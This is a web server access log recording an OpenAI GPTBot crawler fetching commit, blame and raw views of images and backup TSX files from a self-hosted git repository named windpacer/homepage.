[Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10813] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10818] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16911] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" +[17/Feb/2026:13:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508417] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498775] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692322] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429885] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429935] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275077] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" +[17/Feb/2026:13:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699382] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" +[17/Feb/2026:13:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10825] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641761] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508439] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508443] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692337] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641763] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] 